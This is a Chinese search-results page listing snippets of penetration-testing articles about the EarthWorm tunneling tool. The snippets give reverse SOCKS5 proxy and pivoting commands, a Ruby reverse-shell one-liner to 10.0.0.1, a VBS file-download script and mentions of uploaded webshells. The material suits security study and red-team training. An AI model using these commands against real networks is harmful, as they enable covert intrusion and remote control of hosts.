首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏web渗透

    【云+社区年度征文】 EW(EarthWorm) 反向 socks5 代理

    工具: EW: https://github.com/idlefire/ew proxychains: https://github.com/rofl0r/proxychains-ng 小米随身wifi =/etcmake && make installmake install-config 安装成功后,修改其配置为你的公网ip及端口 vi /etc/proxychains.conf 改为 第三步、EW 反向 socks5 代理  服务器端 chmod +x ew_for_linux64. /ew_for_linux64 -s rcsocks -l 1080 -e 1024  kali连接1080端口,正和proxychains配置中端口相对应,然后目标机器连接1024端口,服务器则是将1080 端口的请求发送到1024端口给目标机器 目标机器端 ew_for_Win.exe -s rssocks -d 公网ip -e 1024 手敲代码要注意为rssocks,不是服务器端的rcsocks,第一次测试就因为这个导致失败

    1.5K11发布于 2020-12-03
  • 来自专栏《ATT&CK视角下的红蓝攻防对抗》

    内网穿透之通过Earthworm(EW)进行隧道穿透

    内网穿透之通过Earthworm(EW)进行隧道穿透 一. 通过Earthworm(EW)进行隧道穿透 在进行多层网段渗透时,我们经常会遇到各种代理隧道问题,仅靠使用端口转发无法完成,可以利用Socks协议建立隧道进行连接,Socks是代理服务可以说是lcx 其中-s参数指定使用rcsocks反向代理的方式,-e参数在这里是指攻击机服务端开启监听端口,-d参数是将要映射的端口,如图1-6所示。 6.三层反向代理 根据上述所讲情况,假设PC主机可以出外网,利用EW工具使用反向连接的方式来进行演示三层隧道穿透。 二.本篇总结 随着隧道技术的不断更新迭代,越来越多的攻击者利用隧道技术攻击企业内网,通过本篇文章从Earthworm(EW)隧道工具的利用方式,并且通过大量的案例来演示了多个实际常见的隧道场景,比如我们通过拿到系统权限后利用多个协议实现隧道穿透

    2.1K152编辑于 2023-11-01
  • 来自专栏捞月亮的小北

    解决:Error evaluating expression ew.sqlSegment != null and ew.sqlSegment != and ew.nonEmptyOfWhere

    在写测试方法的时候 ,发现 bookLambdaQueryWrapper.like(name != null, Book::getName , name); 这一句老是报错

    2.1K10编辑于 2024-05-07
  • 来自专栏Bypass

    最好用的内网穿透工具合集

    5、Earthworm 内网穿透 EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。 项目地址: http://rootkiter.com/EarthWorm 使用方法: (1)正向 SOCKS v5 服务器,适用于目标网络边界存在公网IP且可任意开监听端口。 . /ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s ssocksd -l 9999 $ . /ew -s rssocks -d 127.0.0.1 -e 7777 6、reDuh ReDuh 是一个通过 HTTP 协议建立隧道传输各种其他数据的工具,通过在服务器上传JSP/PHP/ASP脚本, 9、sSocks sSocks是一个socks代理工具套装,可用来开启socks代理服务,支持socks5验证,支持IPV6和UDP,并提供反向socks代理服务,即将远程计算机作为socks代理服务端

    8.7K10发布于 2020-09-08
  • 来自专栏闪石星曜CyberSecurity

    EW入侵内网渗透记录

    一、前言 前面一次网进行了内网渗透,这里做个人小结,也方便其他小伙伴学习EW。这里仅记录后渗透中与EW相关的部分已提前在tomcat中留下冰蝎马。 ? 二、本文介绍 1.准备工作 2.EW是什么,可以做什么。 3.内网模拟(基础环境及网络拓扑) 4.EW代理实战 6.利用proxychains代理寻找MS17-010。 三、准备工作 1.模拟环境需要natapp.cn这类NAT穿透工具注册账号购买免费web映射套餐 2.EW内网穿透工具,https://github.com/idlefire/ew 3.一台Ubuntu EW共有 6 种命令格式(ssocksd正向、rcsocks反弹、rssocks反弹、lcx_slave级联 、lcx_listen级联 、lcx_tran级联 )。 同类工具还有socat,就实战来看,EW操作较简单,SOCAT有时会发生段错误,而EW则比较稳定。

    2.8K20发布于 2021-01-11
  • 来自专栏字节脉搏实验室

    内网穿透后抓包技巧

    提出问题:通过ew反向代理后利用proxychains打开了火狐,访问了内网web端口,然后登录处想抓包爆破应该怎么设置这个代理呢? 如果ew流量从1080端口走,bp也设置了1080这样会报端口占用了,如何解决呢? ? 一、实验环境 ? 二、实验工具 Earthworm:下载地址:http://rootkiter.com/EarthWorm/ ? 三、操作步骤 首先模拟提前拿下一台Win7靶机,实战环境可通过蚁剑进行上传EW工具,注意根据实际环境上传对应系统版本的EW文件,实验这里我就直接提前上传EW了。 ? /ew_for_linux64 -s rcsocks -l 1080 -e 8880 该命令是将本地1080端口的流量走向本地8880端口 Win7靶机:ew.exe -s rssocks -d 172.17.60.226

    1.6K20发布于 2020-12-08
  • 来自专栏漏斗社区

    基于百香果内网安全沙盘的SOCKS学习·上篇

    三、EarthWorm 工具介绍 工具介绍: EarthWormEW)是一款便携式的网络工具,具有SOCKS5服务架设和端口转发两大核心功能,可以在复杂的网络环境中实现网络穿透。 EW能够以正向、反向、多级级联等方式建立网络隧道。 EW工具包提供了多个可执行文件,以适用不同的操作系统。 EW的新版本为Termite。 image.png VPS根据实验自行选择Windows或者Kali均可,IP为66.28.6.110,虚拟网卡为仅主机VM6。 image.png 三、ew、SocksCap64和Proxifier基本实验 1. EW隧道通信建立 VPS:访问webshell并上传ew 工具 image.png 配置ew 反向代理监听: ew -s rcsocks -l 1008 -e 888 image.png webshell

    1.2K40发布于 2021-01-08
  • 来自专栏betasec

    安全攻防 | EarthWorm 代理

    EWEarthworm)是一套便携式的网络穿透工具,具有SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。 下载地址:https://github.com/idlefire/ew 官方网站:http://rootkiter.com/EarthWorm/ EW的指令信息如下所示: -s 选择功能类型: 共包含 6种功能: ssocksd:正向代理 rcsocks:反向代理1,流量转发 rssocks:反向代理2,反弹socks5 (6) 在Host2主机开启socks5 服务,并监听9999端口; ./ew -s ssocksd -l 9999 ? A1上proxychains代理配置: [ProxyList]socks5 139.x.x.x 1080 案例6、 三级反向代理功能 在攻击机Hack执行,本地启动流量转发,将来自外部1080

    1.1K20发布于 2021-03-16
  • 来自专栏betasec

    安全攻防 | 网络代理之EarthWorm

    EWEarthworm)是一套便携式的网络穿透工具,具有SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。 下载地址:https://github.com/idlefire/ew 官方网站:http://rootkiter.com/EarthWorm/ EW的指令信息如下所示: -s 选择功能类型: 共包含 6种功能: ssocksd:正向代理 rcsocks:反向代理1,流量转发 rssocks:反向代理2,反弹socks5 (6) 在Host2主机开启socks5 服务,并监听9999端口; ./ew -s ssocksd -l 9999 ? A1上proxychains代理配置: [ProxyList]socks5 139.x.x.x 1080 案例6、 三级反向代理功能 在攻击机Hack执行,本地启动流量转发,将来自外部1080

    4.3K20发布于 2021-03-16
  • 来自专栏FreeBuf

    内网渗透测试:隐藏通讯隧道技术

    上一节中,我们讲解了网络层的隧道技术(IPv6 隧道、ICMP 隧道)和传输层的隧道技术(TCP 隧道、UDP 隧道、常规端口转发)。 EarthWorm 下载链接:https://github.com/rootkiter/EarthWorm https://codeload.github.com/idlefire/ew/zip/master EarthWorm EW有六种命令格式,分别是ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran。 参考: https://blog.csdn.net/Kris__zhang/article/details/106821917 https://www.tuicool.com/articles/JNRn6nY http://rootkiter.com/EarthWorm/ 《内网安全攻防:渗透测试实战指南》

    3K40发布于 2020-07-13
  • 来自专栏kayden

    内网跨边界应用

    官网:http://rootkiter.com/EarthWorm/ github:https://github.com/rootkiter/Binary-files 下载:https://github.com Binary-files/tree/bd3223082afbf88421fe391eb55b9eb2da7d533e 使用说明:https://rootkiter.com/Termite/README.txt EarthWorm SOCK4代理,端口映射 可直接用于metasploit-framework,viper,cobalt strike上线 主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本 6、 rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 6、 open .write xHttp.responseBody .savetofile " C:\%homepath%\file", 2 ' end with 执行 :cscript test.vbs 6

    1.3K10编辑于 2022-09-29
  • 来自专栏漏斗社区

    基于百香果内网安全沙盘的SOCKS学习·下篇

    0x02 实战场景 实战环境模拟真实复杂的网络环境,包括ew的多级级联场景和内网服务器限制主动出网场景。 一、EarthWorm 一级级联和二级级联场景 1. 拓扑变更 image.png 2. 场景任务 Z能够通过WEBShell控制A,经过扫描获得B的SSH弱口令,需要通过EW工具的二级级联在Z上访问到C的WEB服务。 4. 任务配置 1> 先配置1级级联 VPS配置:ew -s rcsocks -l 1008 -e 888 image.png A -> webshell:ew -s rssocks -d 66.28.6.110 场景任务 Z能够通过WEBShell控制A,经过扫描获得B的SSH弱口令,需要通过EW工具的二级级联在Z上访问到C的WEB服务。 4. /ew_for_linux lcx_tran 8888 10.10.16.111 -g 80 image.png 成功实现站点访问。

    86620发布于 2021-01-08
  • 来自专栏FreeBuf

    内网隐藏通信隧道技术——EW隧道

    内网隐藏通信隧道技术——EW隧道 EarthWorm中的应用 在研究人员的渗透测试中,EW很好用,体积小,Linux为30kb左右,windows为56kb左右。 该工具共有6种命令格式(ssocksd、rcsocks、rssocks、lcx_listen、lcx_tran) -l 本地要监听的端口 -f 要主动连接的ip -g 要主动连接的端口 -d 要反弹到的 /ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999 $ . /ew -s ssocksd -l 9999 $ . /ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s ssocksd -l 9999 $ .

    2.5K50发布于 2021-08-24
  • 来自专栏一名白帽的成长史

    【内网渗透】关于内网代理转发技术

    lcx 2、Netsh 本地端口转发 正向端口转发 3、SSH 二、SOCKS代理类 1、reGeorg reGeorg+Proxifier reGeorg+proxychains 类似工具 2、EarthWorm 正向代理 EW 是一套便携式的网络穿透工具,既支持SOCKS5代理转发,又支持静态端口转发。 该工具共有6种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran) 静态端口转发功能和lcx类似,下面来讲讲socks代理功能。 将EW对应的执行程序上传至外网服务器: ? 外网服务器开启代理: ew.exe -s ssocksd -l 8889 ? 可以直接在浏览器中开启代理: ? //这里使用的是FoxyProxy插件。 //成功~ Part.6 结语 好啦,以上就是今天的全部内容了

    3.1K21发布于 2020-07-20
  • 来自专栏云上计算

    森海塞尔Evolution Wireless Digital: EW-DP

    EW-DP系列EW-DP系列除了可堆叠的EW-DP EK接收器外,该系列还包括一个配领夹麦克风的腰包式发射机(EW-D SK)、一个手持式发射机(EW-D SKM-S)和一个即将于10月推出的直插式发射机 (EW-DP SKP)。 当前上市的套装共有三款,包括:EW-DP ME 2 套装,配有一个腰包式发射机和ME 2全指向形夹式(领夹式)麦克风;EW-DP ME 4套装,配有一个心形指向夹式麦克风,适用于噪音较大的环境;以及EW-DP 最后,EW-DP诞生了,我愿称之为极简UHF系统。”值得一提的是,EW-DP是首款具有磁性堆叠接收机的便携式无线系统,该接收机配有朝向用户的OLED显示屏和符合人体工学的操控设计。 EW-DP的磁性板让电影录像师能够简单(且安全)地叠放多个接收器。

    74120编辑于 2023-04-17
  • 来自专栏谢公子学安全

    内网渗透 | 内网转发工具的使用

    内网转发工具的使用 目录 内网转发 reGeorg结合proxychains代理链(HTTP隧道) EW(EarthWorm)结合proxychains代理链 EW正向代理 EW反向代理 Ssocks正向代理 使用nmap程序时应该注意的点 #不能使用nmap默认的扫描方式,不能使用-A -T4参数 proxychains nmap -Pn -sT -p 1-10000 -v 192.168.10.19 EW (EarthWorm)结合proxychains代理链 EW 是一套便携式的网络穿透工具,具有 SOCKS5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。 不管是linux还是windows系统,Earthworm的包都是一个,如图上面。直接进入包里面,选择对应的程序即可执行 EW正向代理 Web服务器的设置 如果是Linux系统 . /ew_for_linux64 -s ssocksd -l 1080 #监听本地的1080端口 如果是Windows系统 ew_for_Win.exe -s ssocksd -l 1080 #

    3.2K20编辑于 2022-01-19
  • 来自专栏Ms08067安全实验室

    内网漫游之SOCKS代理大结局

    1.Earthworm 网址:https://github.com/rootkiter/EarthWorm EW 是一套便携式的网络穿透工具,具有 网址:http://sourceforge.net/projects/ssocks sSocks是一个socks代理工具套装,可用来开启socks代理服务,支持socks5验证,支持IPV66.proxychains 工具网址:http://proxychains.sourceforge.net Proxychains是一款在LINUX下可以实现全局代理的软件,性能相当稳定可靠 EW的使用也非常简单,该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。 先上传ew 到左侧公网VPS上,运行下列命令: ew –s lcx_listen –l 10800 –e 888 ?

    2.7K10发布于 2019-09-24
  • 来自专栏kayden

    隐藏通信隧道技术

    ---- 隐藏通信隧道技术 前言 本篇继续阅读学习《内网安全攻防:渗透测试实战指南》,是第三章隐藏通信隧道技术,详细介绍了IPv6隧道、ICMP隧道、HTTPS隧道、SSH隧道、DNS隧道等加密隧道的使用方法 IPv6隧道可以将IPv4作为隧道载体,将IPv6报文整体封装在IPv4数据报文中 几种工具: socat 6tunnel nt6tunnel 2、ICMP隧道 在一般的通信协议中 EarthWormew、新版本Termite)、reGeorg、sSocks、SocksCap64(SSTap)、Proxifier、ProxyChains 六、压缩数据 1、rar.exe 将E:\ Debug功能将HEX代码编译并还原成EXE文件 在KaliLlnux中,exe2bat.exe工具位于/usr/share/windows-binaries目录,执行 wine exe2bat.exe ew.exe ew.txt 将ew.exe转换为ew.txt 然后,利用目标服务器的Debug功能将HEX代码还原为EXE文件 再使用echo命令将ew.txt里面的代码复制到目标系统的命令行环境中 3、其他 还可以用以下这些上传文件

    1.5K10编辑于 2022-09-29
  • 来自专栏漏洞知识库

    内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

    然后吧生成的脚本abptts.jsp上传上去: 访问:http://192.168.2.13/abptts.jsp 会得到一串加密值: 7d75922bf227ec32477d3bb1f15b6047423a6d23dd449fe61b15dab5d5467f72f9010247.571e91 ---- earthworm正向跨平台socks代理 反向代理 一、客户端攻击机吧外网的888端口转发到本地的1008端口: . /ew_for_linux64 -s rcsocks -l 1008 -e 888 ? 二、目标边界接收888端口的数据: ew_for_Win.exe -s rssocks -d 192.168.2.13 -e 888 ? ? ---- earthworm正向跨平台socks代理 下载地址:https://github.com/L-codes/Neo-reGeorg 一、生成webshell,密码是123456: python

    6K30发布于 2020-11-25
  • 来自专栏HACK学习

    实战 | 记一次基础的内网Vulnstack靶机渗透一

    主机密码收集 内网搜集 1.内网--继续信息收集 2.内网攻击姿势--信息泄露 3.内网攻击姿势-MS08-067 4.内网攻击姿势-SMB远程桌面口令猜测 5.内网攻击姿势-Oracle数据库TNS服务漏洞 6. 2.域渗透-基础服务弱口令探测及深度利用之powershell 3.域渗透-横向移动[wmi利用] 4.域渗透-C2命令执行 5.域渗透-利用DomainFronting实现对beacon的深度隐藏 6. 我们可以尝试直接打开该主机的远程桌面,由于该主机处于内网,我们的攻击机相对之处于外网,无法直接与内网中的主机通信,所以我们需要用Earthworm做Socks5代理作为跳板进入内网获取更多主机。 在我们公网vps上面开启Earthworm监听 . 上传ew_for_Win.exe到win7受害主机,并在win7上面启动socks5服务器并反弹到vps上面 ew_for_Win.exe -s rssocks -d 39.1xx.xx9.xx0 -e

    4.5K20发布于 2021-03-19
领券